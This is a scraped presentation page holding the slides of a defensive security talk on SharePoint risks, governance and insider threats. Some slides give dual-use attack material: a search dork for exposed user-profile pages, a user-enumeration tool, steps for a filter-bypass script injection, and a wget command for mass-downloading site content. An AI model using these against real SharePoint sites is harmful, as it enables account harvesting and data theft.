This document discusses why SharePoint is considered a hacker's dream. It notes that SharePoint usage has grown exponentially in recent years, with over 85 million users across 17,000 companies in 2009. SharePoint is widely used by Fortune 500 companies and contains valuable data, making it an attractive target. The document outlines some high-profile data breaches in recent years that involved SharePoint, including those by Bradley Manning and Edward Snowden. It stresses the importance of proper information security practices for SharePoint, including understanding threats, classification, and establishing governance to reduce risks and protect sensitive data.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
Misconfiguration is define as configuration mistakes that results in unintended application behavior that includes misuse of default passwords, privileges, and excessive debugging information disclosure
Security Operations Center (SOC) Essentials for the SMEAlienVault
Closing the gaps in security controls, systems, people and processes is not an easy feat, particularly for IT practitioners in smaller organizations with limited budgets and few (if any) dedicated security staff. So, what are the essential security capabilities needed to establish a security operations center and start closing those gaps?
Join Javvad Malik of 451 Research and Patrick Bedwell, VP of Product Marketing at AlienVault for this session covering:
*Developments in the threat landscape driving a shift from preventative to detective controls
*Essential security controls needed to defend against modern threats
*Fundamentals for evaluating a security approach that will work for you, not against you
*How a unified approach to security visibility can help you get from install to insight more quickly
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
Misconfiguration is define as configuration mistakes that results in unintended application behavior that includes misuse of default passwords, privileges, and excessive debugging information disclosure
Security Operations Center (SOC) Essentials for the SMEAlienVault
Closing the gaps in security controls, systems, people and processes is not an easy feat, particularly for IT practitioners in smaller organizations with limited budgets and few (if any) dedicated security staff. So, what are the essential security capabilities needed to establish a security operations center and start closing those gaps?
Join Javvad Malik of 451 Research and Patrick Bedwell, VP of Product Marketing at AlienVault for this session covering:
*Developments in the threat landscape driving a shift from preventative to detective controls
*Essential security controls needed to defend against modern threats
*Fundamentals for evaluating a security approach that will work for you, not against you
*How a unified approach to security visibility can help you get from install to insight more quickly
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)
This ‘SQL Injection Attack’ PPT by Edureka will help you learn one of the most dangerous web application vulnerability – SQL Injection.
Below is the list of topics covered in this session:
Web Application Security
What is SQL Injection Attack?
Types of SQL Injection attacks
Demo – SQL Injection Attack Types
Prevention of SQL Injection Attack
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
Talking about Next-Gen Security Operation Center for IDNIC+APJII as representative from IDSECCONF. People-Centric SOC requires lot of investment on human in terms of quantity and quality, unfortunately, (good) IT security people are getting rare these days. Organisation need to put their investments more on technology, as in Industry 4.0, machines are getting more advanced to support Human on doing continuous and repetitive task.
Moving from “traditional” to next-gen SOC require proper plan, thats what this talk was about.
Threat intelligence is information that informs enterprise defenders of adversarial elements to stop them.
It is information that is relevant to the organization, has business value, and is actionable.
If you having all data and feeds then data alone isn’t intelligence.
#Threat #Intelligence #Forensics #ELK #Forensics #VAPT #SOC #SIEM #Incident #D3pak
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
Did you know remote and local file inclusion (RFI/LFI) was among the four most prevalent Web application attacks in 2011? Why is RFI/LFI so attractive to hackers? Quite simply, with RFI/LFI a hacker can take over a Web server. RFI and LFI attacks primarily affect Web applications written in the PHP programming language. PHP is the most popular server-side programming language. In fact, PHP is used by 77.2% of today’s Web sites. This presentation looks at how hackers use RFI/LFI and avoid traditional detection techniques.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault
Due to the recent, well-publicized events involving celebrities and their private photos, the phrase “brute-force attack” has become the web’s newest buzzword. As an IT professional, it’s vital that you detect brute force attacks as quickly as possible so you can shut them down before the damage is done. Join us for a live demo, where we’ll demonstrate a brute force attack (simulated, of course!) and show how AlienVault USM can help you detect an (attempted) intruder and investigate the attack.
You'll learn:
How attackers can use brute force attacks to gain access to your network
Measures you can take to better secure your environment and prevent these attacks
How AlienVault USM alerts you immediately of brute force attack attempts, giving you valuable time to shut it down
How to use AlienVault USM to investigate an attack and identify compromised assets
A Hacker's perspective on AEM applications securityMikhail Egorov
Adobe Experience Manager (AEM), is a comprehensive content management solution for building websites, managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed toolset for AEM hacking to automate security testing of AEM web-applications.
In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise AEM web-application.
In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.
In recent years, large reputable companies such as Facebook, Google and Equifax have suffered major data breaches that combined exposed the personal information of hundreds of millions of people worldwide. The common vector linking these breaches – APIs. The scale and magnitude of these breaches are the reason API security has been launched into the forefront of enterprise security concerns – now forcing us to rethink the way we approach API security as a whole.
OWASP Top 10 project has for a long time been the standard list of top vulnerabilities to look for and mitigate in the world of web applications.
APIs represent a significantly different set of threats, attack vectors, and security best practices. This caused the OWASP community to launch OWASP API Security project earlier this year.
In this session we’ll discuss:
· What makes API Security different from web application security
· The top 10 common API security vulnerabilities
· Examples and mitigation strategies for each of the risks
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
ZAP may not be featured in movies as much as nmap, but is a real hacker tool! If you are a tester in a DevOps organization you know that security is everybody's job, so you MUST add this tool to your toolbox! Attend this talk to see ZAP in action and learn how to use ZAP to test your web applications and web services for OWASP Top 10 vulnerabilities.
Cyber Risk Management in 2017: Challenges & RecommendationsUlf Mattsson
https://www.brighttalk.com/webcast/14723/234829?utm_source=Compliance+Engineering&utm_medium=brighttalk&utm_campaign=234829 :
With cyber attacks on the rise, securing your data is more imperative than ever. In future, organizations will face severe penalties if their data isn’t robustly secured. This will have a far reaching impact for how businesses deal with security in terms of managing their cyber risk.
Join this presentation to learn the cyber security controls prescribed by regulation, how this impacts compliance, and how cyber risk management helps CISOs understand the degree these controls are in place and where to prioritize their cyber dollars and ensure they are not at risk for fines.
Viewers will learn:
- The latest cybercrime trends and targets
- Trends in board involvement in cybersecurity
- How to effectively manage the full range of enterprise risks
- How to protect against ransomware
- Visibility into third party risk
- Data security metrics
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)
This ‘SQL Injection Attack’ PPT by Edureka will help you learn one of the most dangerous web application vulnerability – SQL Injection.
Below is the list of topics covered in this session:
Web Application Security
What is SQL Injection Attack?
Types of SQL Injection attacks
Demo – SQL Injection Attack Types
Prevention of SQL Injection Attack
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
Talking about Next-Gen Security Operation Center for IDNIC+APJII as representative from IDSECCONF. People-Centric SOC requires lot of investment on human in terms of quantity and quality, unfortunately, (good) IT security people are getting rare these days. Organisation need to put their investments more on technology, as in Industry 4.0, machines are getting more advanced to support Human on doing continuous and repetitive task.
Moving from “traditional” to next-gen SOC require proper plan, thats what this talk was about.
Threat intelligence is information that informs enterprise defenders of adversarial elements to stop them.
It is information that is relevant to the organization, has business value, and is actionable.
If you having all data and feeds then data alone isn’t intelligence.
#Threat #Intelligence #Forensics #ELK #Forensics #VAPT #SOC #SIEM #Incident #D3pak
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
Did you know remote and local file inclusion (RFI/LFI) was among the four most prevalent Web application attacks in 2011? Why is RFI/LFI so attractive to hackers? Quite simply, with RFI/LFI a hacker can take over a Web server. RFI and LFI attacks primarily affect Web applications written in the PHP programming language. PHP is the most popular server-side programming language. In fact, PHP is used by 77.2% of today’s Web sites. This presentation looks at how hackers use RFI/LFI and avoid traditional detection techniques.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault
Due to the recent, well-publicized events involving celebrities and their private photos, the phrase “brute-force attack” has become the web’s newest buzzword. As an IT professional, it’s vital that you detect brute force attacks as quickly as possible so you can shut them down before the damage is done. Join us for a live demo, where we’ll demonstrate a brute force attack (simulated, of course!) and show how AlienVault USM can help you detect an (attempted) intruder and investigate the attack.
You'll learn:
How attackers can use brute force attacks to gain access to your network
Measures you can take to better secure your environment and prevent these attacks
How AlienVault USM alerts you immediately of brute force attack attempts, giving you valuable time to shut it down
How to use AlienVault USM to investigate an attack and identify compromised assets
A Hacker's perspective on AEM applications securityMikhail Egorov
Adobe Experience Manager (AEM), is a comprehensive content management solution for building websites, managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed toolset for AEM hacking to automate security testing of AEM web-applications.
In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise AEM web-application.
In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.
In recent years, large reputable companies such as Facebook, Google and Equifax have suffered major data breaches that combined exposed the personal information of hundreds of millions of people worldwide. The common vector linking these breaches – APIs. The scale and magnitude of these breaches are the reason API security has been launched into the forefront of enterprise security concerns – now forcing us to rethink the way we approach API security as a whole.
OWASP Top 10 project has for a long time been the standard list of top vulnerabilities to look for and mitigate in the world of web applications.
APIs represent a significantly different set of threats, attack vectors, and security best practices. This caused the OWASP community to launch OWASP API Security project earlier this year.
In this session we’ll discuss:
· What makes API Security different from web application security
· The top 10 common API security vulnerabilities
· Examples and mitigation strategies for each of the risks
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
ZAP may not be featured in movies as much as nmap, but is a real hacker tool! If you are a tester in a DevOps organization you know that security is everybody's job, so you MUST add this tool to your toolbox! Attend this talk to see ZAP in action and learn how to use ZAP to test your web applications and web services for OWASP Top 10 vulnerabilities.
Cyber Risk Management in 2017: Challenges & RecommendationsUlf Mattsson
https://www.brighttalk.com/webcast/14723/234829?utm_source=Compliance+Engineering&utm_medium=brighttalk&utm_campaign=234829 :
With cyber attacks on the rise, securing your data is more imperative than ever. In future, organizations will face severe penalties if their data isn’t robustly secured. This will have a far reaching impact for how businesses deal with security in terms of managing their cyber risk.
Join this presentation to learn the cyber security controls prescribed by regulation, how this impacts compliance, and how cyber risk management helps CISOs understand the degree these controls are in place and where to prioritize their cyber dollars and ensure they are not at risk for fines.
Viewers will learn:
- The latest cybercrime trends and targets
- Trends in board involvement in cybersecurity
- How to effectively manage the full range of enterprise risks
- How to protect against ransomware
- Visibility into third party risk
- Data security metrics
Cyber Risk Management in 2017 - Challenges & RecommendationsUlf Mattsson
With cyber attacks on the rise, securing your data is more imperative than ever. In future, organizations will face severe penalties if their data isn’t robustly secured. This will have a far reaching impact for how businesses deal with security in terms of managing their cyber risk.
Join this presentation to learn the cyber security controls prescribed by regulation, how this impacts compliance, and how cyber risk management helps CISOs understand the degree these controls are in place and where to prioritize their cyber dollars and ensure they are not at risk for fines.
Viewers will learn:
- The latest cybercrime trends and targets
- Trends in board involvement in cybersecurity
- How to effectively manage the full range of enterprise risks
- How to protect against ransomware
- Visibility into third party risk
- Data security metrics
What is Information Security and why you should care ...James Mulhern
An interactive introduction to Information Security and Cyber Security for BTEC students studying IT at Swindon College in the UK. The session illustrates the breadth and diversity of the subject and opportunities it can offer. The session illustrates things might not always be as they seem and the impacts can be far more reaching than at first imagined.
Launch night presentation from Digital Shadows at London's Innovation Warehouse, August 3rd 2011.
Digital Shadows protects organisations from targeted attacks by reducing their exposure to hostile reconnaissance.
Quantifying Cyber Risk, Insurance and The Value of Personal DataSteven Schwartz
Join Steven Schwartz and Harumi Urata-Thompson, representing Global Cyber Consultants and the International Personal Data Trade Association, as they teach the Columbia University School of International and Public Affairs about quantifying the value of cyber risk, cyber insurance and the value & policy landscape surrounding personal data.
A handbook of the threat intelligence tools your company needsSecuraa
This blog is a Guide to Open Source Threat IntelligenceTools (OSINT), Cyber Tfast-growing threat Intelligence Tools and, CyberThreat Intelligence Platforms. https://www.securaa.io/a-handbook-of-the-threat-intelligence-tools-your-company-needs/
Necmiye Genc, SITA, at International Women's Day Global Event Series. The information security field is expected to see a deficit of 1.5 professionals by 2020. In the face of the desperate need for information security professionals, the report released by (ISC)2, the education and certification body of information security professionals, depicts that women have represented only 10% of the total security workforce. This talk aims to build awareness of the opportunities that exist in security for women of all backgrounds and to introduce advanced technologies such as analytics, threat intelligence and digital forensics to help burgeoning security professionals.
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSRandall Chase
cybersecurity - You Are Being Targeted
Business executive with high-level management and hands-on analytical skill sets and over 27 years of professional experience in technical solutions and service offering development and implementation, organizational strategies for efficiency, cost controls, and bottom-line profitability, multi-million dollar enterprise-wide client engagements, compliance with schedule, budget, and quality requirements, hiring and leadership of high-performance IT employees.
Keyven Lewis, CMIT SOLUTIONS- Cybersecurity - You Are Being Targeted.
An overview to help SMB owners understand the dynamics (exp. the who, the why, and the how) of cybersecurity as it relates to their business.
Joint Presentation on The State of Cybersecurity ('15-'16) & Third Party Cyb...Rishi Singh
Presentation on the 2015-2016 State of Cybersecurity and Third Party Vendor Risk Management, presented by Matt Pascussi and Rishi Singh.
This presentation was sponsored by TekSystems.
Shining a Light on Cyber Threats from the Dark Web
Hacking_SharePoint_FINAL
1. SharePoint
A Hackers Dream
Ian Naumenko, CISSP
Spot Solutions Ltd.
SharePoint Saturday Vancouver, March 11, 2016 Spot Solutions Ltd.
2. Thanks to all the Sponsors !!!
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
3. Ian Naumenko, CISSP
WORK
✘ Director IT and Security Operations – Spot Solutions Ltd
BOARDS
✘ Vice President of InfoSecBC
(Vancouver Security Special Interest Group)
✘ President Western Region IAMCP Canada
(International Association of Microsoft Chanel Partners)
✘ Work with POLCYB
(The Society for The Policing of cyberspace)
Education, Certifications
✘ Computer Sciences, CISSP, Various Microsoft Certs, ISO 90001, random
others…
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
4. I’m not dissing SharePoint…
✘SharePoint is a excellent collaboration platform and overall
Microsoft is doing a great job making the technology secure.
✘It’s not usually the technology that is at fault, it’s how we use the
technology that matters…
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
6. Why is SharePoint a hackers dream ?
Over the past several years, the uptake of SharePoint has been
considerable. Way back in 2009, it was estimated that SharePoint had
licensed more than 85 million users to an estimated 17,000 companies.
This number has grown exponential in recent years, especially with Microsoft
"Core CALS" (which include SharePoint), and the introduction of SharePoint
online and Office365.
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
7. Why is it a hackers dream ?
“According to Association for Information and Image Management
(AIIM) one in two corporations are now using SharePoint
Server and in 22% of the companies, every employee uses
this popular Microsoft collaboration tool.” http://www.topsharepoint.com/fortune-
500-companies-using-sharepoint
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
8. Why is it a hackers dream ?
A vast number of Fortune 500 Private companies use
SharePoint for their internal and external content
UPS Store
Proctor and
Gamble
SC JohnsonBristol-Myers
Squibb
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
9. Why is it a hackers dream ?
..usage includes Enterprise search, enterprise content management (ECM),
Business Process Management, business intelligence, records management,
archiving, Intranet/Extranet, file sharing to public-facing websites…
Spot Solutions Ltd.SharePoint Saturday Vancouver
Contains lots of valuable data
Making it a big juicy target !!!
Ian Naumenko, CISSP
10. Why do we care…
2015's biggest hacks, breaches
✘Ashley Madison – 37 million “cheaters” records released
✘Vtech – 4.8 million records including info on 200,000 kids
✘70 million prisoner phone records stolen (attorney-client privilege may have been violated )
✘FBI's portal breached, thousands of arrestees' data at risk, including access to CIA director John
Brennan's private email account (widest external breaches of law enforcement this year)
✘Donald Trump's hotel chain hack hit thousands of hotel visitors. (credit card data including security
codes and card numbers)
✘Crowdfunding service Patreon hack led to 15GB data dump
✘Experian breach hit 15 million T-Mobile customers
✘Scottrade hack: Details on 4.6 million customers stolen
✘Excellus BlueCross BlueShield – 10 million records
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
11. Why do we care…
2015's biggest hacks, breaches
✘Carphone Warehouse tops UK breach list with 2.4 million affected
✘CVS, Walgreens, credit card breach, millions of CC, email, postal codes etc., records leaked
✘UCLA Health failed to encrypt 4.5 million records
✘Hacking Team exploits put hundreds of millions of Flash users at risk
✘OPM breach, which affected 22.1 million US government workers (and counting).
✘LastPass customers at risk after millions of passwords accessed
✘The IRS data breach, stolen tax returns of over 100,000 tax payers
✘Anthem (US healthcare provider) breach affected one-third of Americans
The annual cost of data breaches in the US is estimated to be $100 billion
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
12. Why do we care…Bradley Manning
Forensics discovered WGET scripts on
Manning’s computer that pointed to a Microsoft
SharePoint server holding the Gitmo documents.
He ran the scripts to download the documents…
Edward Snowden
NSA, General Keith Alexander indicated…
“This leaker was a system administrator who was trusted with moving
the information to actually make sure that the right information was on
the SharePoint servers that NSA Hawaii needed." He then added that
the leak was " ... a huge break in trust and confidence. So there are
issues we have got to fix there.”
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
13. So, what do we need to do…
To start…
1. We need to understand what Information Security really is all about…
2. We need to understand external and internal threats…
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
15. Security is not a group in SharePoint…
“To many in the SharePoint world, “SharePoint
security” is synonymous with “SharePoint
permissions” and the Snowden breach is a
great example of how permissions are a single
point of failure but do not (in and of themselves)
equate to a proper security architecture.”
http://www.nothingbutsharepoint.com/2013/08/30/sharepoint-security-impacts-from-snowden-and-wikileaks-
breaches-aspx/
16. Need to understand the CIA …
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
19. Confidentiality, Integrity and Availability
Confidentiality - Confidentiality refers to limiting information access and disclosure to authorized users -- "the right
people" -- and preventing access by or disclosure to unauthorized ones -- "the wrong people.“
(Think authentication, permissions and groups in SharePoint, who gets to see what…)
Integrity - Integrity refers to the trustworthiness of information resources. It includes the concept of "data
integrity" -- namely, that data have not been changed inappropriately, whether by accident or deliberately malign
activity. It also includes "origin" or "source integrity" -- that is, that the data actually came from the person or
entity you think it did, rather than an imposter.
(Think SharePoint’s “Created by” or “Last modified” each time a document is uploaded/changed)
Availability - Availability refers, unsurprisingly, to the availability of information resources. An information
system that is not available when you need it is almost as bad as none at all. It may be much worse, depending
on how reliant the organization has become on a functioning computer and communications infrastructure.
(Think Disaster recovery, High Available)
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
20. Information Classification…
Classifying data is the process of categorizing data assets based on nominal values according to
its sensitivity (e.g., impact of applicable laws and regulations).
An example of a Data Classification:
Public - Information that may or must be open to the general public.
Internal - Information that must be guarded due to proprietary, ethical, or privacy
considerations.
Confidential - Highly sensitive data intended for limited, specific use by a workgroup,
department, or group of individuals with a legitimate need-to-know.
Regulatory Data Classification - Information that’s protected by statutes and regulations, and
governed by a regulatory body or council regarding the investigation, response, reporting and
handling of incidents.
Spot Solutions Ltd.SharePoint Saturday Vancouver
21. Understand the b’s and the C’s
Business
✘ Technology and security are there to support the business, not the other way around
✘ Difference between a manufacturer and a Healthcare provider
✘ Government has different drivers since it's goal is to protect public
✘ Understand the actual business need
✘ Add business value
Culture
✘ Heads down, don’t rock the boat
✘ Where's my bonus
Assets
✘ Are we spending a Lonnie to save a dime?
✘ What is our risk appetite?
✘ Risk avoidance, reduction, transfer, acceptance
✘ Risk = Likelihood x Impact
Business
Security
Technology
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
22. Security basics: definitions of threat, attack and risk
Definition of threat: an object, person, or other entity that represents a constant danger to
an asset
Definition of vulnerability: a weakness that makes targets susceptible to an attack.
Definition of attack: an action taken against a target with the intention of doing harm.
Definition of risk: the likelihood of being targeted by a given attack, of an attack being
successful, and general exposure to a given threat.
Source: Excerpt from CISSP Guide to Security Essentials, chapter 10
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
25. Internal Threats…“Most data security threats are internal”
internal vulnerabilities in some form or
another responsible for a total of 70 percent
of breaches Forrester
✘Employees (The ones you always do, but shouldn't trust)
✘Developers (No-one trust these guys)
✘Administrators (All powerful)
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
26. Internal
✘ lost or stolen devices account for 31
percent of all data security breaches
✘ accidental misuse by an employee accounted
for another 27 percent of incidents
✘ 12 percent of breaches were caused by
malicious insiders
✘ 22 percent of incidents involved either
customer or employee data. In addition to
reputational damage
✘ 19 percent of breaches involved intellectual
property
http://blog.trendmicro.com/most-data-security-threats-are-internal-forrester-says/
threats…
Spot Solutions Ltd.SharePoint Saturday Vancouver
27. Pieces of a puzzle….
Hackers don’t wave a magic wand and voila, there in…. If organized, Information is gathered over time from multiple sources and
techniques, then slowly assembled like a puzzle
• BotNets
• Hacking
• Malware
• Pharming
• Phishing
• Ransomware
• Spam
• Spoofing
• Spyware
• Trojan Horses
• Viruses
• Worms
• WiFi
Eavesdropping
• Email scams
• Phishing and
Smishing scams
• Contests and
Scams
• Online dating
scams
• Social network
scams
• Fraudulent calls
• Social engineering
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
29. ✘ Don’t assume that just because you have some SP permissions setup
that your data is “automatically” safe, this applies on premise,
hosted solutions and Office 365
✘ We need to start treating SharePoint as a business critical
repository of important, sensitive business information
✘ Security is not just a checklist, it’s a strategy”
✘ Threats are not just external…
✘ SharePoint Security only stands a chance if there is governance
Spot Solutions Ltd.
can be
vulnerable if we
are not carefulis
Ian Naumenko, CISSPSharePoint Saturday Vancouver
30. Governance is the key
✘ “Governance for SharePoint could be defined as your strategy for delivering the business
solutions your end users want, within the scope of the technology and security considerations, while
maintaining those business constraints.”
✘ Reducing risk – “just over 43 percent claimed they do not regularly run audits on usage, security,
content or permissions, which is frightening to say the least. A governance plan that protects business
IP and is aligned with the appropriate compliance regulations helps reduce potentially devastating risk
and losses in the future.“
✘ “Governance actually enables business agility and protects the business from data leaks, risk and
lost resources”
Great free resource all above quotes from Metalogix ebook – SharePoint Governance best practices by SharePoint MVP Christian Buckly
Spot Solutions Ltd.Ian Naumenko, CISSPSharePoint Saturday Vancouver
32. On-Premise
✘ Pros
• All corporate data is kept onsite, in-house
• Data sovereignty (i.e. keeping content within the country)
• More ability for customization (farm solutions) – don’t have to rely on JavaScript
• Knowing your sysadmin team and those who have the key’s to your kingdom
• CIA - Confidentiality and Integrity
✘Cons
• Less or no internal “security minded” resources available
• Limited or over stretched sysadmin resources
• More upkeep and maintenance costs for infrastructure
• Developers of farm solutions need to follow SSDLC and need to understand the potential impacts of custom code.
• CIA - Availability
Deployments…
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
33. Cloud
✘ Pros
• Little or no internal infrastructure
• Vast Microsoft infrastructure and security resources
• Automated backup
• Scalability
• CIA - Availability
✘Cons
• If internet is down or inaccessible, so is your data
• All data is available externally
• Data is stored wherever Microsoft decides
• Data sovereignty – even if in a Canadian Data center, operations owned by a foreign country
• Adequately secure against rogue systems administrators and insiders…
• CIA – Confidentiality, Availability
Deplolyments…
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
36. Three click attack…
SharePoint Hacking Diggity Project – Bishop Fox
http://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/
✘ UserDispEnum
• UserDispEnum is a SharePoint user enumeration tool that exploits insecure access controls to the
/_layouts/UserDisp.aspx?ID=1 page. This utility cycles through the integer ID values from 1 onward to identify
valid users, account names, and other related profile information that can easily be extracted from the SharePoint
user profiles.
Paste this into your browser: http://www.google.com/#q=inurl:”/_layouts/userdisp.aspx
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
42. Also many technical vulnerabilities…
✘ Microsoft Security Bulletin MS15-036 - Elevation of Privilege
• April 14, 2015: - The attacker who successfully exploited these vulnerabilities could then perform cross-site
scripting attacks on affected systems and run script in the security context of the current user. These attacks
could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take
actions on the SharePoint site on behalf of the victim, such as change permissions and delete content, and inject
malicious content in the victim’s browser.
✘ Microsoft SharePoint Online (cloud) - filter bypass & persistent vulnerability
• Aug 18, 2015: - It is possible to evade the current security controls on Microsoft SharePoint Online 2013 Web
Application by simply adding a blank iframe in the HTML through `embed code` feature. It does not matter what
policies have been implemented through the `HTML Field Security` feature. All filters / policies are easily evaded
using the above mentioned filter bypass technique and this should be fixed immediately. Please note, once the
filter is evaded, it is possible to inject malicious script code without any restrictions and it doesn`t get stripped /
filtered even after publishing. Successful exploitation of the vulnerability results in filter evasion of all SharePoint
security policies for the websites and allows execution of persistent script code that can result in session
hijacking, persistent phishing, stable external redirect, stable external malware loads and persistent vulnerable
module context manipulation.
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
43. Microsoft SharePoint Online (cloud) - filter bypass & persistent vulnerability
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low required user
interaction and (restricted) privileged SharePoint cloud application user account. For security demonstration or to
reproduce the vulnerability follow the provided information and steps below.
1. Register an office and SharePoint online 2013 account
2. Login to the SharePoint portal as admin
3. Goto your Site and click on Edit
4. Goto Insert and include "embed code"
5. in the Input box, enter the given "Payload"
6. Click Insert and then Save
7. Upon being redirected to the index page, a javascript box should pop up proving the existence of this vulnerability
http://www.vulnerability-lab.com/get_content.php?id=1024
SharePoint Saturday Vancouver Ian Naumenko, CISSP Spot Solutions Ltd.
44. WGET Script
✘ What is WGET ?
• It's a command-line tool to download webpages and their assets
✘ Why does it matter….
• Mass content download !
The following command will download all the content from SharePoint to static pages using WGET. WGET even
fixes all links so that most navigation still works.
wget -r --no-parent --convert-links -P c:temp<my local folder> --http-user=<domainusername> --http-
passwd=<password> http://<path to sharepoint>
✘ What can we do to prevent it’s use…
• WGET respects passwords
• wget respects, by default, your robots.txt file
• webservers can be set up to deny WGET’s default user agent
• All that being said, it’s really hard to block
SharePoint Saturday Vancouver Ian Naumenko, CISSP Spot Solutions Ltd.
45. What can we do ?SharePoint Saturday Vancouver Spot Solutions Ltd.Ian Naumenko, CISSP
46. Vulnerability assessment tools and resources…
✘ Assessment tools from vendors such
Metalogix - Free Insider Threat Vulnerability tool
ShareGate – SharePoint Security Tool
AveDoc – Governance Automation
✘ OWASP top 10
✘ KALI disc (pen testing)
✘ Microsoft Security Center – Security bulletins
https://technet.microsoft.com/en-us/library/security/dn631937.aspx
✘ Common Vulnerabilities and Exposures Database
http://www.cve.mitre.org/find/index.html
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
47. Points to remember…
✘ SharePoint doesn’t matter, the business matters. (quoted from metalogix Governave Best Practices ebook)
✘ We have to approach cloud services by assuming that your data is being looked at
by third parties, including cloud systems administrators, and by governmental
agencies…
✘ Most IT platforms, and particularly collaboration-oriented platforms, are challenged
to adequately secure against rogue systems administrators and insiders. The
solution to securing SharePoint and other IT platforms against insiders will always
boil down to careful application of security controls, which are not all ways
technical…
http://www.nothingbutsharepoint.com/2013/08/30/sharepoint-security-impacts-from-snowden-and-wikileaks-breaches-aspx/
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
48. Points to remember… (cont…)
✘Don’t take the technology for granted.
✘Governance is most important. “Its not a checklist, it’s a strategy”
✘Educate staff in simple language they can understand and relate
